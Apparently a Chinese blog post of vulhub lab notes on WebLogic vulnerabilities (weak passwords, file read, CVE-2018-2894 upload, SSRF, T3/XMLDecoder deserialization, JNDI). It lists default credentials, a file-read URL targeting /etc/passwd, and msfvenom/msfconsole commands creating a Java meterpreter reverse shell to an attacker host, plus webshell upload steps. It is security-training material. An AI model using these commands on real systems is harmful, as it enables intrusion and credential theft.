【中间件漏洞】(一)

最新推荐文章于 2024-07-18 08:53:45 发布
最新推荐文章于 2024-07-18 08:53:45 发布
阅读量593 收藏 8
点赞数 25
分类专栏: 渗透测试 文章标签: 中间件 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46318447/article/details/139627448
版权

Weblogic漏洞

关于中间件,可以理解为:是一类能够为一种或多种应用程序合作互通、资源共享,同时还能够为该应用程序提供相关的服务的软件。(注意:中间件是一类软件的总称,不是单独的一个软件)

一、漏洞列表

编号类型利用方式
弱口令、任意文件读取获得密码进后台,传马
CVE-2018-2894任意文件上传后台传马getshell
CVE-2014-4210SSRF利用redis协议getshell
CVE-2020-14882Console远程代码执行GET、POST、XML
CVE-2018-2628T3协议反序列化RMI攻击,ysoserial工具
CVE-2017-10271XMLDecoder反序列化构造反弹payload
CVE-2023-21839JNDI注入和log4j一致

二、Weblogic 基本介绍

全名:Oracle WebLogic Server,JavaEE服务器
商业产品,适用于大型商业项目
同类产品:IBM WebSphere、Apache Tomcat、
Redhat Jboss
常见版本:
WebLogic Server 10.x ——11g
WebLogic Server 12.x ——12c
vulhub靶场——基于WebLogic Server 10.3.6
默认端口:7001

三、历史漏洞概况

四、弱口令、任意文件读取

4.1 弱口令漏洞

漏洞环境:vulhub/weblogic/weakpass
漏洞描述:利用常用弱口令暴破进入后台
weblogic常用弱口令:
system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

4.2 任意文件读取漏洞

漏洞描述:可以读取服务器任意文件。在读取到密钥和密码密文以后,可以AES解密出后台密码
http://192.168.142.133:7001/hello/file.jsp?path=/etc/passwd
密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
rializedSystemIni.dat,
相对路径:security/SerializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/con
fig.xml ,
相对路径:config/config.xml

4.3 获取密码密文payload

在这里插入图片描述

4.4 获取密钥payload

在这里插入图片描述

4.5 解密工具

https://github.com/TideSec/Decrypt_Weblogic_Password
getshell

  1. kali生成木马 msfvenom -p java/meterpreter/reverse_tcplhost=192.168.142.162 lport=4444 -f war -o java.war

  2. 点击左侧 部署->安装->上传war包->(全部下一步)-> 完成

  3. kali监听 msfconsole
    use exploit/multi/handler
    set payload java/meterpreter/reverse_tcp
    set LHOST 192.168.142.162
    set LPORT 4444
    exploit

  4. 访问: http://192.168.142.133:7001/java

五、任意文件上传getshell

5.1 任意文件上传漏洞

影响版本:
10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3
漏洞环境
vulhub/weblogic/CVE-2018-2894
docker-compose logs | grep password
登录到后台,开启 Web Service Test Page :
登录 -> base-domain ->高级 -> 开启 web测试页 -> 保存

5.2 漏洞利用

漏洞地址:http://192.168.142.133:7001/ws_utc/config.do
1、修改工作目录
2、点击安全----添加,上传大马dama.jsp
3、F12, 搜索keystore_table,找到时间戳
4、访问木马

六、SSRF探测redis getshell

CVE- 2014-4210 SSRF
漏洞描述

  1. SSRF是Server-side Request Forge的缩写,中文翻译为服务端请求伪造。产生的原因是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对地址和协议等做过滤和限制。
  2. 利用SSRF漏洞可以发送Redis协议数据,执行Redis相关命令,进而getshell

漏洞概况
影响版本:
weblogic 10.0.2 – 10.3.6
漏洞环境
vulhub/weblogic/ssrf
获取内网IP:
docker ps
docker exec -it 容器ID ifconfig
访问:
http://192.168.142.133:7001/uddiexplorer/ (无需登录)
http://192.168.142.133:7001/uddiexplorer/SearchPublicRegistries.jsp
抓包,修改operator值为:http://172.21.0.2.6379/

七、未授权远程代码执行漏洞

7.1 漏洞描述

weblogic未授权漏洞:CVE-2020-14882
weblogic命令执行漏洞:CVE-2020-14883

  1. CVE-2020-14882允许未授权的用户绕过管理控制台(Console)的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。
  2. 使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

原理分析(拓展资料):
https://xz.aliyun.com/t/8470

7.2 利用方式

三种利用方式:
1、执行payload后不回显,但是已经执行成功
2、执行payload后回显
通过GET方式进行payload提交
通过POST方式进行payload提交
3、通过把payload构造为XML格式进行引用

7.3 利用流程:

https://github.com/GGyao/CVE-2020-14882_ALL/tree/master

八、T3协议反序列化RCE

漏洞描述

  1. Weblogic开放控制台的7001端口,默认会开启T3协议服务
  2. Weblogic的T3协议实现了RMI(远程方法调用),在 WebLogic Server 和其他 Java 程序间传输数据
  3. T3协议的缺陷触发了Weblogic Server WLS Core Components中存在的反序列化漏洞
  4. 攻击者可以发送构造的恶意T3协议数据,服务器反序列化以后执行恶意代码,获取到目标服务器权限

原理分析(拓展资料):
https://xz.aliyun.com/t/8073
T3反序列化漏洞概况
影响版本:
10.3.6.0
12.1.3.0
12.2.1.2
12.2.1.3
漏洞环境
vulhub/weblogic/CVE-2018-2628
T3协议检测
nmap -n -v -p 7001,7002 192.168.142.133 --script=weblogic-t3-info

利用流程

复现步骤(总体)

  1. kali启动JRMPListener,参数包含恶意代码恶 意代码的作用是连接到7777端口
  2. kali创建7777端口监听
  3. 运行poc.py,让漏洞服务器主动连接RMI服务 器,进而下载恶意代码,建立反弹连接

payload准备
1、生成payload
2、kali启动JRMPListener
3、kali监听
4、kali运行运行POC(只支持Python2)

九、XML解析反序列化RCE

漏洞描述
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
原理分析(拓展资料):
https://xz.aliyun.com/t/10172

XML反序列化漏洞
影响版本:
10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0
漏洞环境
vulhub/weblogic/CVE-2017-10271
访问
http://192.168.142.133:7001/wls-wsat/CoordinatorPortType

十、JNDI注入漏洞

10.1 漏洞描述

1、T3/IIOP协议支持远程绑定对象bind到服务端,而且可以通
过lookup代码c.lookup(“xxxxxx”); 查看
2、远程对象继承自OpaqueReference并lookup查看远程对象
时,服务端会调用远程对象getReferent方法
3、由于
weblogic.deployment.jms.ForeignOpaqueReference继承自
OpaqueReference并实现getReferent方法,存在retVal =
context.lookup(this.remoteJNDIName)实现,所以能够通过
RMI/LDAP远程协议进行远程命令执行
注:JNDI注入可以参考学习:《CVE漏洞复现-Log4j漏洞》

10.2 JNDI注入漏洞

影响版本:
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
漏洞环境
vulhub/weblogic/CVE-2023-21839

利用流程
1、kali启动LDAP服务器,指定payload
2、Kali监听端口
3、Windows向漏洞服务器发送poc

学无止境xq
关注
  • 25
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中间件漏洞合集.zip
07-15
"中间件漏洞合集.zip"是一个包含多个中间件安全漏洞信息的压缩文件,主要目的是供学习和研究,以提升网络安全意识和防护能力。下面我们将深入探讨中间件漏洞的相关知识。 1. **中间件的概念与作用** 中间件是一种...
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
中间件漏洞
buffedon的博客
07-04 571
这里写目录标题1. 中间件解析漏洞IIS5.x/6.0解析漏洞Nginx < 8.03的畸形解析漏洞Apache 解析漏洞2. 中间件其他漏洞2.1 Apache2.2 Tomcat2.3 Nginx2.4 IIS2.5 Weblogic2.6 Jboss 1. 中间件解析漏洞 服务器应用程序在解析某些后缀文件时,会将其解析成网页脚本 从而导致网站的沦陷。大部分解析漏洞的产生都是由应用程序本身的漏洞导致的。 IIS5.x/6.0解析漏洞 ​ 1. 文件解析 网页木马文件的名字改成 “test.asp
常见中间件漏洞复现
君莫hacker的博客
11-08 8362
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
2024HW--->中间件漏洞!!!
huohaowen的博客
04-04 1242
上次好像记得讲过了框架漏洞,(weblogic不是)那么,今天我们就来讲一些中间件漏洞
中间件漏洞汇总
热门推荐
LainWith的博客
11-26 1万+
目录一些地址什么是中间件iis6x篇PUT漏洞漏洞描述漏洞复现防御方式解析漏洞-基于文件名原理复现防御解析漏洞-基于文件夹原理复现防御IIS短文件漏洞介绍原理复现防御RCE-CVE-2017-7269介绍影响范围复现防御iis7x篇文件解析漏洞原理复现防御HTTP.SYS远程代码执行(MS15-034)介绍影响范围影响版本复现修复建议apache篇未知扩展名解析漏洞漏洞原理复现修复建议AddHandler导致的解析漏洞原理复现修复建议目录遍历漏洞原理复现防御Apache HTTPD 换行解析漏洞(CVE-2
常见中间件漏洞的总结
qq_40898302的博客
06-07 9050
常见中间件漏洞总结
中间件漏洞及修复汇总
看着博客敲代码
07-29 2757
中间件漏洞及修复汇总 1.Nginx文件解析漏洞漏洞等级:高危 漏洞描述: nginx文件解析漏洞产生的原因是网站中间键版本过低,可将任意文件当作php可执行文件来执行,可导致攻击者执行恶意代码来控制服务器。 漏洞危害: 机密数据被窃取; 核心业务数据被篡改; 网页被篡改; 数据库所在服务器被攻击变为傀儡主机,导致局域网(内网)被入侵。 修复方案: 升级中间件版本 部署Web应用防火墙 对数据库操作进行监控 修改php.ini文件,将cgi.fix_pathinfo的值设置为0; 在Nginx配置文件中
中间件漏洞总结
shayebudon的博客
04-02 1万+
一、IIS 1.iis6.0解析漏洞 该版本默认将*.asp;.jpg此类格式的文件名,当成asp解析,服务器默认;后面的内容不解析,相当于截断,例如上传asp木马,就可以用xx.asp;.jpg来绕过;iis除了会将asp解析成脚本执行文件之外,还会将 cer cdx asa扩展名解析成asp 防御方法: 1.禁止上传和创建此类畸形文件 2.图片存放目录设置为禁止脚本执行 2.iis6 PUT漏洞 IIS Server在web中开启了webDAV 配置了可以写入的权限,造成了任意文件上传。 防御方法: 1
JSP中间件漏洞
hellodaoyan的博客
03-12 454
jsp的注入最难挖 另外3个好挖。
WEB常见中间件漏洞原理
qq_37561898的博客
04-25 3706
Apache Shiro反序列化 在shiro≤1.2.4版本,默认使CookieRememberMeManager,由于AES使用的key泄露,导致反序化的cookie可控,从而引发反序化攻击。(理论上只要AES加密钥泄,都会导致反序化) 利用的两个关键条件是key和可用gadget。1.2.4版本默认key为kPH+bIxk5D2deZiIxcaaaA== 触发反序列化流程:读取cookie -> base64解码 -> AES解密 -> 反序列化 DNS可以出网,使用
web中间件常见漏洞总结.pdf
12-14
然而,由于其复杂性和广泛的使用,Web中间件也成为了攻击者的目标,存在多种可能的安全漏洞。以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意...
中间件漏洞详解
06-11
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
Web中间件常见漏洞总结.pdf
06-14
Web中间件常见漏洞总结
中间件——Kafka
weixin_44040169的博客
07-14 1531
Kafka——生产者、消费者、高可用机制、备份机制、消息可靠性
中间件的理解
modi000的博客
07-15 420
直接返回,前置服务可以支持更高流量的并发,后置的需要耗时、耗力的,需要IO操作的服务,可以通过MQ慢慢处理。前端写消息的速率比后端处理消息的速率要快很多的。a.快递员角度:快递员无需将快递直接交到用户手里,放在菜鸟驿站即可走了,增加了送快递的数量,提高了送快递的效率;b.用户角度:快递到达的时候在上班,当时无时间取快递,当有了菜鸟驿站后,用户可以在下班闲暇时间去取快递。所以,中间件可以多个可能互相调用的系统耦合程度,提升接口的响应速度,。c.双十一的时候,快递量暴增,快递员不会手忙脚乱、用户可排序取快递。
Node学习-第六章-express中间件与RESful API接口规范(上)
莫莫博客
07-15 1292
Morgan是Express框架的一部分,但它也可以独立于任何特定框架使用,为一个HTTP请求日志中间件,它提供了灵活的日志格式,使得你可以轻松定制你的日志输出。只需几行代码,你就可以开启全面的日志监控,无论是简单的信息还是详细的错误报告。主要是是项目模块化。通过本章的学习可以实现项目代码目录清晰,已经构建相对健全的框架结构。405 Method Not Allowed:用户已经通过身份验证,但是所用的 HTTP 方法不在他的权限之内。200状态码表示操作成功,但是不同的方法可以返回更精确的状态码。
FastAPI -- 第三弹(自定义响应、中间件、代理、WebSockets)
最新发布
DragonFangQy
07-18 491
如果你需要压榨性能,你可以安装并使用orjson并将响应设置为# 使用 ORJSONResponse 代替 JSONResponse。
【ROS2】高级:解锁 Fast DDS 中间件的潜力 [社区贡献]
cxyhjl的博客
07-16 1347
目标:本教程将展示如何在 ROS 2 中使用 Fast DDS 的扩展配置功能。教程级别:高级时间:20 分钟目录背景先决条件在同一个节点中混合同步和异步发布创建具有发布者的节点创建包含配置文件的 XML 文件执行发布者节点创建一个包含订阅者的节点执行订阅者节点示例分析使用其他 FastDDS 功能与 XML限制匹配订阅者的数量在主题内使用分区配置服务和客户端使用服务和客户端创建节点为服...
常见的Java中间件漏洞
05-20
Java中间件是指在Java平台上运行的各种中间件软件,例如应用服务器、消息中间件、缓存服务器等。常见的Java中间件漏洞包括: 1. Tomcat漏洞:Tomcat是一个流行的Java应用服务器,在过去的几年中发现了多个严重漏洞,包括目录遍历漏洞和远程执行漏洞。 2. JBoss漏洞:JBoss是一个流行的开源应用服务器,它也曾经被发现了多个漏洞,包括远程代码执行漏洞和未授权访问漏洞。 3. WebLogic漏洞WebLogic是Oracle公司的一款Java应用服务器,2019年曝出了一个严重漏洞(CVE-2019-2725),攻击者可以通过发送特制的HTTP请求来执行恶意代码。 4. ActiveMQ漏洞:ActiveMQ是一个流行的开源消息中间件,曾经被发现过多个漏洞,包括拒绝服务漏洞和路径遍历漏洞。 5. Redis漏洞:Redis是一款流行的开源缓存服务器,曾经被发现过多个漏洞,包括远程代码执行漏洞和拒绝服务漏洞。 6. Elasticsearch漏洞:Elasticsearch是一款流行的开源搜索引擎,曾经被发现过多个漏洞,包括远程代码执行漏洞和未授权访问漏洞。 以上只是一些常见的Java中间件漏洞,实际上还有很多其他的漏洞类型和具体的漏洞实例。为了保障系统安全,需要及时更新中间件版本,以及加强配置和管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值